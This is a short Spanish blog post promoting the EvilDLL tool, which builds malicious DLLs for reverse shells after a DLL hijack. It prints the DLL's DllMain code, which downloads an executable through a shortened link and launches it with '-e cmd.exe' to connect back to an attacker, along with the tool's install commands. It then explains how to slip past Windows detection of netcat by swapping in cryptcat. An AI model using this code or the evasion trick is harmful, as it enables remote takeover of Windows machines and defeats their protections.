EvilDLL v1.0 de thelinuxchoice es una herramienta bastante útil que nos facilitará la creación de DLLs maliciosas para obtener nuestra shell reversa en caso de que hayamos podido explotar un DLL hijacking. Además tendremos la opción de crear esa shell mediante un reenvío de puertos directo a nuestra máquina o mediante un túnel con ngrok.
Probado en Win7 (7601) y Windows 10 lo único que necesitaremos es el compilador Mingw-w64 (apt-get install mingw-w64) y setear el auhtoken de ngrok previo registro (./ngrok authtoken <YOUR_AUTHTOKEN>).
Después simplemente clonar el repo y ejecutar el script principal de bash:
git clone https://github.com/thelinuxchoice/evildll
cd evildll
bash evildll.sh
Custom:
(Si quieres probarlo rápido: rundll32 rest.dll,dllmain)
Ngrok:
pd. El código descargará nc.exe (https://raw.githubusercontent.com/WifiLANDucky/ncatdownload/master/nc.exe) para usarlo:
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
if (dwReason == DLL_PROCESS_ATTACH) {
system("C:\\Windows\\System32\\cmd.exe /c mkdir c:\\dll 2> NUL & echo ^[Net.ServicePointManager^]::SecurityProtocol ^= ^[Net.SecurityProtocolType^]::Tls12 > c:\\dll\\b.ps1 & echo (wget 'https://tinyurl.com/y88r9epk' -OutFile c:\\dll\\a.exe) >> c:\\dll\\b.ps1 & powershell -ExecutionPolicy ByPass -File c:\\dll\\b.ps1 & START /MIN c:\\dll\\a.exe server_ip server_port -e cmd.exe -d & exit");
ExitProcess(0);
}
return TRUE;
}
El problema es que el sistema por defecto detectará y parará la ejecución de tan famosa navaja suiza:
Lo más rápido y sencillo para bypassear este pequeño inconveniente parece usar crypcat en su lugar, así que sustituimos el ejecutable y a volar:
C:\dll>powershell -ExecutionPolicy ByPass -File c:\\dll\\b.ps1 & START /MIN c:\\dll\\a.exe 192.168.1.133 4444 -e cmd.exe -d